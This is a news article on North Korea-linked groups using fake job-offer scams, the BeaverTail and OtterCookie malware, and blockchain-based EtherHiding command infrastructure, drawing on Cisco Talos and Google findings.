North Korean Hackers Deploy Blockchain-Based Tools in Expanding Global Cyber Campaign

North Korea-linked threat actors are escalating their cyber operations using decentralized and evasive malware tools, according to new findings from Cisco Talos and Google Threat Intelligence Group.

The campaigns aim to steal cryptocurrency, infiltrate networks, and evade detection through sophisticated job recruitment scams.

Evolving Malware Techniques Reflect Expanding Capabilities

Cisco Talos researchers identified an ongoing campaign by the North Korean group Famous Chollima. The group has used two complementary malware strains, BeaverTail and OtterCookie. These programs, traditionally used for credential theft and data exfiltration, have now evolved to integrate new functionalities and closer interoperation.

In a recent incident involving an organization in Sri Lanka, attackers lured a job seeker into installing malicious code disguised as part of a technical evaluation. Even though the organization itself was not a direct target, Cisco Talos analysts also observed a keylogging and screenshotting module linked to OtterCookie, which highlights the broader risk to individuals involved in fake job offers. This module covertly recorded keystrokes and captured desktop images, automatically transmitting them to a remote command server.

Cisco Talos reports that the North Korean group Famous Chollima is using a new JavaScript module combining BeaverTail and OtterCookie for keylogging and screenshots, targeting job seekers through fake offers and malicious Node.js packages. #CyberSecurity

— Cyber_OSINT (@Cyber_O51NT)

This observation underscores the ongoing evolution of North Korea-aligned threat groups and their focus on social engineering techniques to compromise unsuspecting targets.

Blockchain Used as a Command Infrastructure

Google’s Threat Intelligence Group (GTIG) identified an operation by a North Korea-linked actor, UNC5342. The group used a new malware called EtherHiding. This tool hides malicious JavaScript payloads on a public blockchain, turning it into a decentralized command and control (C2) network.

By using blockchain, attackers can change malware behavior remotely without traditional servers. Law enforcement takedowns become much harder. Furthermore, GTIG reported that UNC5342 applied EtherHiding in a social engineering campaign called Contagious Interview, which had been previously identified by Palo Alto Networks, demonstrating the persistence of North Korea-aligned threat actors.

What is EtherHiding?It's a novel technique where the attackers embed malicious payloads (like JADESNOW and INVISIBLEFERRET malware) within smart contracts on public blockchains (like BNB Smart Chain and Ethereum).

— blackorbird (@blackorbird)

Targeting Job Seekers to Steal Cryptocurrency and Data

According to Google researchers, these cyber operations typically begin with fraudulent job postings aimed at professionals in the cryptocurrency and cybersecurity industries. Victims are invited to participate in fake assessments, during which they are instructed to download files embedded with malicious code.

The infection process often involves multiple malware families, including JadeSnow, BeaverTail, and InvisibleFerret. Together, they let attackers access systems, steal credentials, and deploy ransomware efficiently. The end goals range from espionage and financial theft to long-term network infiltration.

Cisco and Google have published indicators of compromise (IOCs) to help organizations detect and respond to ongoing North Korea-linked cyber threats. These resources provide technical details for identifying malicious activity and mitigating potential breaches. Researchers warn that the integration of blockchain and modular malware will likely continue to complicate global cybersecurity defense efforts.